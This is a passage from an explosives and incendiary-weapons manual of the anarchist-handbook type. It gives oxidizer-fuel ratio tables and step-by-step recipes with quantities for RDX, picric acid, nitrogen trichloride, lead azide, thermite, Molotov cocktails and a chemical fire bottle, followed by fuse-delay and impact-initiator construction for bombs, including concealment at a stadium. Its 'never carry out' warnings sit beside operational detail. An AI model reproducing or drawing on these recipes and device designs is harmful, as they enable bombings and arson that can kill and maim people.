ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium chlorate 67% magnesium or
8 unstable
aluminum dust 33%
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
sodium nitrate 65% magnesium dust 30% ? unpredictable
sulfur 5% burn rate
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium permanganate 60% glycerine 40% 4 delay before
ignition depends
WARNING: IGNITES SPONTANEOUSLY WITH GLYCERINE!!! upon grain size
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium permanganate 67% sulfur 33% 5 unstable
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium permangenate 60% sulfur 20% 5 unstable
magnesium or
aluminum dust 20%
ÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium permanganate 50% sugar 50% 3 ?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium nitrate 75% charcoal 15% 7 this is
sulfur 10% black powder!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium nitrate 60% powdered iron 1 burns very hot
or magnesium 40%




oxidizer, % by weight fuel, % by weight speed # notes
================================================================================
potassium chlorate 75% phosphorus 8 used to make strike-
sesquisulfide 25% anywhere matches
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ammonium perchlorate 70% aluminum dust 30% 6 so
lid fuel for
and small amount of space shuttle
iron oxide
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium perchlorate 67% magnesium or 10 flash powder
(sodium perchlorate) aluminum dust 33%
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium perchlorate 60% magnesium or 8 alternate
(sodium perchlorate) aluminum dust 20% flash powder
sulfur 20%
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
barium nitrate 30% aluminum dust 30% 9 alternate
potassium perchlorate 30% flash powder
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
barium peroxide 90% magnesium dust 5% 10 alternate
alumin
um dust 5% flash powder
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium perchlorate 50% sulfur 25% 8 slightly
magnesium or unstable
aluminum dust 25%
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium chlorate 67% red phosphorus 27% 7 very unstable
calcium carbonate 3% sulfur 3% impact sensitive
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium permanganate 50% powdered sugar 25% 7 unstable;
aluminum or ignites if
magnesium dust 25% it gets wet!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
potassium chlorate 75% charcoal dust 15% 6 unstable
sulfur 10%
================================================================================
NOTE: Mixtures that uses substitutions of sodium perchlorate for potassium
perchlorate become moisture-absorbent and less stable.
The higher the speed number, the faster the fuel-oxodizer mixture burns
AFTER ignition. Also, as a rule, the finer the powder, the faster the rate of
burning.
As one can easily see, there is a wide variety of fuel-oxodizer mixtures
that can be made at home. By altering the amounts of fuel and oxodizer(s),
different burn rates can be achieved, but this also can change the sensitivity
of the mixture.

3.24 PERCHLORATES
As a rule, any oxidizable material that is treated with perchloric acid
will become a low order explosive. Metals, however, such as potassium or
sodium, become excellent bases for flash-type powders. Some materials that can
be perchlorated are cotton, paper, and sawdust. To produce potassium or sodium
perchlorate, simply acquire the
hydroxide of that metal, e.g. sodium or
potassium hydroxide. It is a good idea to test the material to be perchlorated
with a very small amount of acid, since some of the materials tend to react
explosively when contacted by the acid. Solutions of sodium or potassium
hydroxide are ideal.




3.3 HIGH-ORDER EXPLOSIVES
High order explosives can be made in the home without too much
difficulty. The main problem is acquiring the nitric acid to produce the high
explosive. Most high explosives detonate because their molecular structure is
made up of some fuel and usually three or more NO2 ( nitrogen dioxide )
molecules. T.N.T., or Tri-Nitro-Toluene is an excellent example of such a
material. When a shock wave passes through an molecule of T.N.T., the
nitrogen dioxide bond is broken, and the oxygen combines with the fuel, all in
a matter of microseconds. This accounts for the great power of nitrogen-based
explosives. Remembering that these procedures are NEVER TO BE CARRIED OUT,
several methods of
manufacturing high-order explosives in the home are listed.


3.31 R.D.X.
R.D.X., also called cyclonite, or composition C-1 (when mixed with
plasticisers) is one of the most valuable of all military explosives. This is
because it has more than 150% of the power of T.N.T., and is much easier to
detonate. It should not be used alone, since it can be set off by a not-too
severe shock. It is less sensitive than mercury fulminate, or nitroglycerine,
but it is still too sensitive to be used alone. R.D.X. can be made by the
surprisingly simple method outlined hereafter. It is much easier to make in the
home than all other high explosives, with the possible exception of ammonium
nitrate.

MATERIALS EQUIPMENT
ÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄ
hexamine 500 ml beaker
or
methenamine glass stirring rod
fuel tablets (50 g)
funnel and filter paper
concentrated
nitric acid
(550 ml) ice bath container
(plastic bucket)
distilled water
centigrade thermometer
table salt
blue litmus paper
ice
ammonium nitrate
1) Place the beaker in the ice bath, (see section 3.13, steps 3-4) and carefully
pour 550 ml of concentrated nitric acid into the beaker.
2) When the acid has cooled to below 20 degrees centigrade, add small amounts of
the crushed fuel tablets to the beaker. The temperature will rise, and it
must be kept below 30 degrees centigrade, or dire consequences could result.
Stir the mixture.
3) Drop the temperature below zero degrees centigrade, either by adding more ice
and salt to the old ice bath, or by creating a new ice bath. Or, ammonium
nitrate could be added to the old ice bath, since it becomes cold when it is
put in water. Continue stirring the mixture, keeping the temperature below
zero degrees centigrade for at le
ast twenty minutes





4) Pour the mixture into a litre of crushed ice. Shake and stir the mixture,
and allow it to melt. Once it has melted, filter out the crystals, and
dispose of the corrosive liquid.
5) Place the crystals into one half a litre of boiling distilled water. Filter
the crystals, and test them with the blue litmus paper. Repeat steps 4 and 5
until the litmus paper remains blue. This will make the crystals more stable
and safe.
6) Store the crystals wet until ready for use. Allow them to dry completely
using them. R.D.X. is not stable enough to use alone as an explosive.
7) Composition C-1 can be made by mixing 88.3% R.D.X. (by weight) with 11.1%
mineral oil, and 0.6% lecithin. Kneed these material together in a plastic
bag. This is a good way to desensitize the explosive.
8) H.M.X. is a mixture of T.N.T. and R.D.X.; the ratio is 50/50, by weight.
it is not as sensitive, and is almost as powerful as straight R.D.X.
9) By adding ammonium nitrate to the crys
tals of R.D.X. after step 5, it should
be possible to desensitize the R.D.X. and increase its power, since ammonium
nitrate is very insensitive and powerful. Soduim or potassium nitrate could
also be added; a small quantity is sufficient to stabilize the R.D.X.
10) R.D.X. detonates at a rate of 8550 meters/second when it is compressed to a
density of 1.55 g/cubic cm.

3.32 AMMONIUM NITRATE
Ammonium nitrate could be made by a terrorist according to the hap-
hazard method in section 2.33, or it could be stolen from a construction site,
since it is usually used in blasting, because it is very stable and insensitive
to shock and heat. A terrorist could also buy several Instant Cold-Paks from a
drug store or medical supply store. The major disadvantage with ammonium
nitrate, from a terrorist's point of view, would be detonating it. A rather
powerful priming charge must be used, and usually with a booster charge. The
diagram below will explain.
______________________________
___________
| | |
________| | |
| | T.N.T.| ammonium nitrate |
|primer |booster| |
|_______| | |
| | |
|_______|_______________________________|
The primer explodes, detonating the T.N.T., which detonates, sending
a tremendous shockwave through the ammonium nitrate, detonating it.

3.33 ANFOS
ANFO is an acronym for Ammonium Nitrate - Fuel Oil Solution. An ANFO
solves the only other major problem with ammonium nitrate: its tendency to pick
up water vapor from the air. This results in the explosive failing to detonate
when such an attempt is made. This is rectified by mixing 94% (by weight)
ammonium nitrate with 6% fuel oil, or kerosene. The kerosene keeps the ammonium
nitrate from absorbing moisture from the air. An ANFO also requires a large
shockwave to s
et it off.




3.34 T.N.T.

T.N.T., or Tri-Nitro-Toluene, is perhaps the second oldest known high
explosive. Dynamite, of course, was the first. It is certainly the best known
high explosive, since it has been popularized by early morning cartoons. It
is the standard for comparing other explosives to, since it is the most well
known. In industry, a T.N.T. is made by a three step nitration process that is
designed to conserve the nitric and sulfuric acids which are used to make the
product. A terrorist, however, would probably opt for the less economical one
step method. The one step process is performed by treating toluene with very
strong (fuming) sulfuric acid. Then, the sulfated toluene is treated with very
strong (fuming) nitric acid in an ice bath. Cold water is added the solution,
and it is filtered.


3.35 POTASSIUM CHLORATE

Potassium chlorate itself cannot be made in the home, but it can be
obtained from labs. If potassium chlorate is mixed with a small amount of
vaseline, or
other petroleum jelly, and a shockwave is passed through it, the
material will detonate with slightly more power than black powder. It must,
however, be confined to detonate it in this manner. The procedure for making
such an explosive is outlined below:


MATERIALS EQUIPMENT
ÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄ

potassium chlorate zip-lock plastic bag
(9 parts, by volume)
petroleum jelly clay grinding bowl
(vaseline) or
(1 part, by volume) wooden bowl and wooden spoon


1) Grind the potassium chlorate in the grinding bowl carefully and slowly,
until the potassium chlorate is a very fine powder. The finer that it is
powdered, the faster (better) it will detonate.
2) Place the powder into the plastic bag. Put the petroleum jelly into the
plastic bag, getting as little on the sides of the bag as possible, i.e.
put the vaseline on the potassium chlorate powder.
3) Close
the bag, and kneed the materials together until none of the potassium
chlorate is dry powder that does not stick to the main glob. If necessary,
add a bit more petroleum jelly to the bag.
4) The material must me used within 24 hours, or the mixture will react to
greatly reduce the effectiveness of the explosive. This reaction, however,
is harmless, and releases no heat or dangerous products.








3.36 DYNAMITE
The name dynamite comes from the Greek word "dynamis", meaning power.
Dynamite was invented by Nobel shortly after he made nitroglycerine. It was
made because nitroglycerine was so dangerously sensitive to shock. A misguided
individual with some sanity would, after making nitroglycerine (an insane act)
would immediately convert it to dynamite. This can be done by adding various
materials to the nitroglycerine, such as sawdust. The sawdust holds a large
weight of nitroglycerine per volume. Other materials, such as ammonium nitrate
could be added, and they would tend to d
esensitize the explosive, and increase
the power. But even these nitroglycerine compounds are not really safe.


3.37 NITROSTARCH EXPLOSIVES

Nitrostarch explosives are simple to make, and are fairly powerful. All
that need be done is treat various starches with a mixture of concentrated nitric
and sulfuric acids. 10 ml of concentrated sulfuric acid is added to 10 ml of
concentrated nitric acid. To this mixture is added 0.5 grams of starch. Cold
water is added, and the apparently unchanged nitrostarch is filtered out.
Nitrostarch explosives are of slightly lower power than T.N.T., but they are
more readily detonated.


3.38 PICRIC ACID

Picric acid, also known as Tri-Nitro-Phenol, or T.N.P., is a military
explosive that is most often used as a booster charge to set off another less
sensitive explosive, such as T.N.T. It another explosive that is fairly simple
to make, assuming that one can acquire the concentrated sulfuric and nitric
acids. Its procedure for manufacture is given i
n many college chemistry lab
manuals, and is easy to follow. The main problem with picric acid is its
tendency to form dangerously sensitive and unstable picrate salts, such as
potassium picrate. For this reason, it is usually made into a safer form, such
as ammonium picrate, also called explosive D. A social deviant would probably
use a formula similar to the one presented here to make picric acid.



MATERIALS EQUIPMENT
ÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄ
phenol (9.5 g) 500 ml flask
concentrated adjustable heat source
sulfuric acid (12.5 ml)
1000 ml beaker
concentrated nitric or other container
acid (38 ml) suitable for boiling in
distilled water filter paper
and funnel
glass stirring rod






1) Place 9.5 grams of pheno
l into the 500 ml flask, and carefully add 12.5
ml of concentrated sulfuric acid and stir the mixture.
2) Put 400 ml of tap water into the 1000 ml beaker or boiling container and
bring the water to a gentle boil.
3) After warming the 500 ml flask under hot tap water, place it in the boiling
water, and continue to stir the mixture of phenol and acid for about thirty
minutes. After thirty minutes, take the flask out, and allow it to cool for
about five minutes.
4) Pour out the boiling water used above, and after allowing the container to
cool, use it to create an ice bath, similar to the one used in section 3.13,
steps 3-4. Place the 500 ml flask with the mixed acid an phenol in the ice
bath. Add 38 ml of concentrated nitric acid in small amounts, stirring the
mixture constantly. A vigorous but "harmless" reaction should occur. When
the mixture stops reacting vigorously, take the flask out of the ice bath.
5) Warm the ice bath container, if it is glass, and then begin boil
ing more tap
water. Place the flask containing the mixture in the boiling water, and heat
it in the boiling water for 1.5 to 2 hours.
6) Add 100 ml of cold distilled water to the solution, and chill it in an ice
bath until it is cold.
7) Filter out the yellowish-white picric acid crystals by pouring the solution
through the filter paper in the funnel. Collect the liquid and dispose of it
in a safe place, since it is corrosive.
8) Wash out the 500 ml flask with distilled water, and put the contents of the
filter paper in the flask. Add 300 ml of water, and shake vigorously.
9) Re-filter the crystals, and allow them to dry.
10) Store the crystals in a safe place in a glass container, since they will
react with metal containers to produce picrates that could explode
spontaneously.

3.39 AMMONIUM PICRATE

Ammonium picrate, also called Explosive D, is another safety explosive.
It requires a substantial shock to cause it to detonate, slightly less than that
required to d
etonate ammonium nitrate. It is much safer than picric acid, since
it has little tendency to form hazardous unstable salts when placed in metal
containers. It is simple to make from picric acid and clear household ammonia.
All that need be done is put the picric acid crystals into a glass container and
dissolve them in a great quantity of hot water. Add clear household ammonia in
excess, and allow the excess ammonia to evaporate. The powder remaining should
be ammonium picrate.

3.40 NITROGEN TRICHLORIDE

Nitrogen trichloride, also known as chloride of azode, is an oily yellow
liquid. It explodes violently when it is heated above 60 degrees celsius, or
when it comes in contact with an open flame or spark. It is fairly simple to
produce.





1) In a beaker, dissolve about 5 teaspoons of ammonium nitrate in water.
Do not put so much ammonium nitrate into the solution that some of it
remains undissolved in the bottom of the beaker.
2) Collect a quantity of chlorine gas in a second bea
ker by mixing hydrochloric
acid with potassium permanganate in a large flask with a stopper and glass
pipe.
3) Place the beaker containing the chlorine gas upside down on top of the
beaker containing the ammonium nitrate solution, and tape the beakers
together. Gently heat the bottom beaker. When this is done, oily yellow
droplets will begin to form on the surface of the solution, and sink down
to the bottom. At this time, remove the heat source immediately.
Alternately, the chlorine can be bubbled through the ammonium nitrate
solution, rather than collecting the gas in a beaker, but this requires
timing and a stand to hold the beaker and test tube.
The chlorine gas can also be mixed with anhydrous ammonia gas, by gently
heating a flask filled with clear household ammonia. Place the glass tubes
from the chlorine-generating flask and the tube from the ammonia-generating
flask in another flask that contains water.
4) Collect the yellow droplets with
an eyedropper, and use them immediately,
since nitrogen trichloride decomposes in 24 hours.

3.41 LEAD AZIDE
Lead Azide is a material that is often used as a booster charge for
other explosive, but it does well enough on its own as a fairly sensitive
explosive. It does not detonate too easily by percussion or impact, but it
is easily detonated by heat from an igniter wire, or a blasting cap. It is
simple to produce, assuming that the necessary chemicals can be procured.
By dissolving sodium azide and lead acetate in water in separate
beakers, the two materials are put into an aqueous state. Mix the two beakers
together, and apply a gentle heat. Add an excess of the lead acetate
solution, until no reaction occurs, and the precipitate on the bottom of the
beaker stops forming. Filter off the solution, and wash the precipitate in
hot water. The precipitate is lead azide, and it must be stored wet for safety.
If lead acetate cannot be found, simply acquire acetic acid, and put lead
metal
in it. Black powder bullets work well for this purpose.

3.5 OTHER "EXPLOSIVES"
The remaining section covers the other types of materials that can
be used to destroy property by fire. Although none of the materials
presented here are explosives, they still produce explosive-style results.
3.51 THERMIT
Thermit is a fuel-oxodizer mixture that is used to generate tremendous
amounts of heat. It was not presented in section 3.23 because it does not react
nearly as readily. It is a mixture of iron oxide and aluminum, both finely
powdered. When it is ignited, the aluminum burns, and extracts the oxygen from
the iron oxide. This is really two very exothermic reactions that produce a
combined temperature of about 2200 degrees C. This is half the heat produced by
an atomic weapon. It is difficult to ignite, however, but when it is ignited,
it is one of the most effective firestarters around.




MATERIALS
ÄÄÄÄÄÄÄÄÄ
powdered aluminum (10 g)
powdered iron oxide (10 g)

1) Th
ere is no special procedure or equipment required to make thermit. Simply
mix the two powders together, and try to make the mixture as homogenous as
possible. The ratio of iron oxide to aluminum is 50% / 50% by weight, and
be made in greater or lesser amounts.
2) Ignition of thermite can be accomplished by adding a small amount of
potassium chlorate to the thermit, and pouring a few drops of sulfuric acid
on it. This method and others will be discussed later in section 4.33. The
other method of igniting thermit is with a magnesium strip. Finally, by
using common sparkler-type fireworks placed in the thermit, the mixture
can be ignited.

3.52 MOLOTOV COCKTAILS

First used by Russians against German tanks, the Molotov cocktail is now
exclusively used by terrorists worldwide. They are extremely simple to make, and
can produce devastating results. By taking any highly flammable material, such
as gasoline, diesel fuel, kerosene, ethyl or methyl alcohol, lighter fluid,
turpe
ntine, or any mixture of the above, and putting it into a large glass
bottle, anyone can make an effective firebomb. After putting the flammable
liquid in the bottle, simply put a piece of cloth that is soaked in the liquid
in the top of the bottle so that it fits tightly. Then, wrap some of the cloth
around the neck and tie it, but be sure to leave a few inches of lose cloth to
light. Light the exposed cloth, and throw the bottle. If the burning cloth
does not go out, and if the bottle breaks on impact, the contents of the bottle
will spatter over a large area near the site of impact, and burst into flame.
Flammable mixtures such as kerosene and motor oil should be mixed with a more
volatile and flammable liquid, such as gasoline, to insure ignition. A mixture
such as tar or grease and gasoline will stick to the surface that it strikes,
and burn hotter, and be more difficult to extinguish. A mixture such as this
must be shaken well before it is lit and thrown


3.53 CHEMICAL FIRE BOTTLE
The chemic
al fire bottle is really an advanced molotov cocktail. Rather
than using the burning cloth to ignite the flammable liquid, which has at best
a fair chance of igniting the liquid, the chemical fire bottle utilizes the very
hot and violent reaction between sulfuric acid and potassium chlorate. When the
container breaks, the sulfuric acid in the mixture of gasoline sprays onto the
paper soaked in potassium chlorate and sugar. The paper, when struck by the
acid, instantly bursts into a white flame, igniting the gasoline. The chance
of failure to ignite the gasoline is less than 2%, and can be reduced to 0%, if
there is enough potassium chlorate and sugar to spare.










MATERIALS EQUIPMENT
ÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄ
potassium chlorate glass bottle
(2 teaspoons) (12 oz.)
sugar (2 teaspoons) cap for bottle,
with plastic inside
concentrated
cooking pan with raised
sulfuric acid (4 oz.) edges
gasoline (8 oz.) paper towels
glass or plastic cup
and spoon


1) Test the cap of the bottle with a few drops of sulfuric acid to make sure
that the acid will not eat away the bottle cap during storage. If the
acid eats through it in 24 hours, a new top must be found and tested, until
a cap that the acid does not eat through is found. A glass top is excellent.
2) Carefully pour 8 oz. of gasoline into the glass bottle.
3) Carefully pour 4 oz. of concentrated sulfuric acid into the glass bottle.
Wipe up any spills of acid on the sides of the bottle, and screw the cap on
the bottle. Wash the bottle's outside with plenty of water. Set it aside
to dry.
4) Put about two teaspoons of potassium chlorate and about two teaspoons of
sugar into the glass or plastic cup. Add about 1/2 cup of boiling water,
or enough
to dissolve all of the potassium chlorate and sugar.
5) Place a sheet of paper towel in the cooking pan with raised edges. Fold
the paper towel in half, and pour the solution of dissolved potassium
chlorate and sugar on it until it is thoroughly wet. Allow the towel to
dry.
6) When it is dry, put some glue on the outside of the glass bottle containing
the gasoline and sulfuric acid mixture. Wrap the paper towel around the
bottle, making sure that it sticks to it in all places. Store the bottle
in a place where it will not be broken or tipped over.
7) When finished, the solution in the bottle should appear as two distinct
liquids, a dark brownish-red solution on the bottom, and a clear solution
on top. The two solutions will not mix. To use the chemical fire bottle,
simply throw it at any hard surface.
8) NEVER OPEN THE BOTTLE, SINCE SOME SULFURIC ACID MIGHT BE ON THE CAP, WHICH
COULD TRICKLE DOWN THE SIDE OF THE BOTTLE AND IGNITE THE POTASSIUM CHLORATE,
CAUSING A FIR
E AND/OR EXPLOSION.
9) To test the device, tear a small piece of the paper towel off the bottle,
and put a few drops of sulfuric acid on it. The paper towel should
immediately burst into a white flame.








3.54 BOTTLED GAS EXPLOSIVES

Bottled gas, such as butane for refilling lighters, propane for propane
stoves or for bunsen burners, can be used to produce a powerful explosion. To
make such a device, all that a simple-minded anarchist would have to do would be
to take his container of bottled gas and place it above a can of Sterno or other
gelatinized fuel, and light the fuel and run. Depending on the fuel used, and
on the thickness of the fuel container, the liquid gas will boil and expand to
the point of bursting the container in about five minutes. In theory, the gas
would immediately be ignited by the burning gelatinized fuel, producing a large
fireball and explosion. Unfortunately, the bursting of the bottled gas container
often puts out the fuel, thus preventing the expanding gas
from igniting. By
using a metal bucket half filled with gasoline, however, the chances of ignition
are better, since the gasoline is less likely to be extinguished. Placing the
canister of bottled gas on a bed of burning charcoal soaked in gasoline would
probably be the most effective way of securing ignition of the expanding gas,
since although the bursting of the gas container may blow out the flame of the
gasoline, the burning charcoal should immediately re-ignite it. Nitrous oxide,
hydrogen, propane, acetylene, or any other flammable gas will do nicely.


4.0 USING EXPLOSIVES

Once a terrorist has made his explosives, the next logical step is to
apply them. Explosives have a wide range of uses, from harassment, to vandalism,
to murder. NONE OF THE IDEAS PRESENTED HERE ARE EVER TO BE CARRIED OUT, EITHER
IN PART OR IN FULL! DOING SO CAN LEAD TO PROSECUTION, FINES, AND IMPRISONMENT!
The first step that a person that would use explosive would take would
be to determine how big an explosiv
e device would be needed to do whatever had
to be done. Then, he would have to decide what to make his bomb with. He would
also have to decide on how he wanted to detonate the device, and determine
where the best placement for it would be. Then, it would be necessary to see
if the device could be put where he wanted it without it being discovered or
moved. Finally, he would actually have to sit down and build his explosive
device. These are some of the topics covered in the next section.

4.1 SAFETY
There is no such thing as a "safe" explosive device. One can only speak
in terms of relative safety, or less unsafe.

4.2 IGNITION DEVICES
There are many ways to ignite explosive devices. There is the classic
"light the fuse, throw the bomb, and run" approach, and there are sensitive
mercury switches, and many things in between. Generally, electrical detonation
systems are safer than fuses, but there are times when fuses are more
appropriate than electrical systems; it is difficult to carr
y an electrical
detonation system into a stadium, for instance, without being caught. A device
with a fuse or impact detonating fuse would be easier to hide.








4.21 FUSE IGNITION

The oldest form of explosive ignition, fuses are perhaps the favorite
type of simple ignition system. By simply placing a piece of waterproof fuse in
a device, one can have almost guaranteed ignition. Modern waterproof fuse is
extremely reliable, burning at a rate of about 2.5 seconds to the inch. It is
available as model rocketry fuse in most hobby shops, and costs about $3.00 for
a nine-foot length. Fuse is a popular ignition system for pipe bombers because
of its simplicity. All that need be done is light it with a match or lighter.
Of course, if the Army had fuses like this, then the grenade, which uses
fuse ignition, would be very impracticle. If a grenade ignition system can be
acquired, by all means, it is the most effective. But, since such things do not
just float around, the next best thing is
to prepare a fuse system which does
not require the use of a match or lighter, but still retains its simplicity.
One such method is described below:

MATERIALS
_________
strike-on-cover type matches
electrical tape or duct tape
waterproof fuse
1) To determine the burn rate of a particular type of fuse, simply measure a
6 inch or longer piece of fuse and ignite it. With a stopwatch, press the
start button the at the instant when the fuse lights, and stop the watch when
the fuse reaches its end. Divide the time of burn by the length of fuse, and
you have the burn rate of the fuse, in seconds per inch. This will be shown
below:
Suppose an eight inch piece of fuse is burned, and its complete time
of combustion is 20 seconds.


20 seconds
ÄÄÄÄÄÄÄÄÄÄ = 2.5 seconds per inch.
8 inches

If a delay of 10 seconds was desired with this fuse, divide the desired
time by the number of seconds per inch:
10 seconds
ÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄ = 4 inches
2.5 seconds / inch
NOTE: THE LENGTH OF FUSE HERE MEANS LENGTH OF FUSE TO THE POWDER. SOME FUSE,
AT LEAST AN INCH, SHOULD BE INSIDE THE DEVICE. ALWAYS ADD THIS EXTRA
INCH, AND PUT THIS EXTRA INCH AN INCH INTO THE DEVICE!!!

2) After deciding how long a delay is desired before the explosive device is
to go off, add about 1/2 an inch to the premeasured amount of fuse, and
cut it off.





3) Carefully remove the cardboard matches from the paper match case. Do not
pull off individual matches; keep all the matches attached to the cardboard
base. Take one of the cardboard match sections, and leave the other one
to make a second igniter.
4) Wrap the matches around the end of the fuse, with the heads of the matches
touching the very end of the fuse. Tape them there securely, making sure not
to put tape over the match heads. Make sure they are very secure by pulling
on them at the base of the assembly. They should not be able to move.
5) Wrap the
cover of the matches around the matches attached to the fuse, making
sure that the striker paper is below the match heads and the striker faces
the match heads. Tape the paper so that is fairly tight around the matches.
Do not tape the cover of the striker to the fuse or to the matches. Leave
enough of the match book to pull on for ignition.
_____________________
\ /
\ / ------ match book cover
\ /
| M|f|M ---|------- match head
| A|u|A |
| T|s|T |
| C|e|C |
|tapeH|.|Htape|
| |f| |
|#####|u|#####|-------- striking paper
|#####|s|#####|
\ |e| /
\ |.| /
\ |f| /
\ |u| /
|ta|s|pe|
|ta|e|pe|
|.|
|f|
|u|
|s|
|e|
|.|
|_|

The match book is wrapped around the matches, and is taped to itself.
The matches are taped to the fuse. The striker will rub against the
matcheads when the match book is pulled.
6) When ready to use, simply pull on the match paper. It should pull the
striking paper across the match heads with enough friction to light them.
In turn, the burning matcheads will light the fuse, since it adjacent to the
burning match heads.


4.22 IMPACT IGNITION
Impact ignition is an excellent method of ignition for spontaneous
terrorist activities. The problem with an impact-detonating device is that it
must be kept in a very safe container so that it will not explode while being
transported to the place where it is to be used. This can be done by having a
removable impact initiator.




The best and most reliable impact initiator is one that uses factory
made initiators or primers. A no. 11 cap for b
lack powder firearms is one such
primer. They usually come in boxes of 100, and cost about $2.50. To use such
a cap, however, one needs a nipple that it will fit on. Black powder nipples
are also available in gun stores. All that a person has to do is ask for a
package of nipples and the caps that fit them. Nipples have a hole that goes
all the way through them, and they have a threaded end, and an end to put the
cap on. A cutaway of a nipple is shown below:
________________
| |
_ |
| | |
_______| |^^^^^^^^| |
| ___________| |
| | |
no. 11 |_______| |
percussion _______ | ------- threads for screwing
cap here | | | nipple onto bomb
| |___________ |
|_______ | |
| |^^^^^^
^^^| |
|_| |
|
|________________|

When making using this type of initiator, a hole must be drilled into
whatever container is used to make the bomb out of. The nipple is then screwed
into the hole so that it fits tightly. Then, the cap can be carried and placed
on the bomb when it is to be thrown. The cap should be bent a small amount
before it is placed on the nipple, to make sure that it stays in place. The
only other problem involved with an impact detonating bomb is that it must
strike a hard surface on the nipple to set it off. By attaching fins or a small
